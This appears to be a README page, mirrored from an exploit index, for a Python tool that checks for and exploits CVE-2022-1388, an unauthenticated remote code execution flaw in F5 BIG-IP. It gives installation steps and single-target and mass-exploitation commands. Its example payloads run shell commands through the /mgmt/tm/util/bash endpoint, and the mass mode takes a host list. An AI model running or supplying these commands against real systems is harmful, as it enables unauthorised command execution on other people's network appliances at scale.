Share
## https://sploitus.com/exploit?id=D2CE9456-EDAA-59FB-AD0F-78E18BE9A0D0
# CVE-2022-1388
## Checking and exploit for CVE-2022-1388

#### Installation:
```
python3 -m pip install -r requirements.txt
```

#### Usage

Single : 
```bash
python3 cve.py s [fullurl] [api_command]

#example
python3 cve.py s http://127.0.0.1:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'
```
Mass :

```bash
python3 cve.py m [host list] [endpoint] [api_command] [pool]

#example
python3 cve.py m host.txt /mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}' 10
```

### References:
- https://github.com/Zeyad-Azima/CVE-2022-1388
- https://github.com/bandit92/CVE2022-1388_TestAPI
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://www.obrela.com/f5-big-ip-cve-2022-1388-unauthenticated-rce-vulnerability/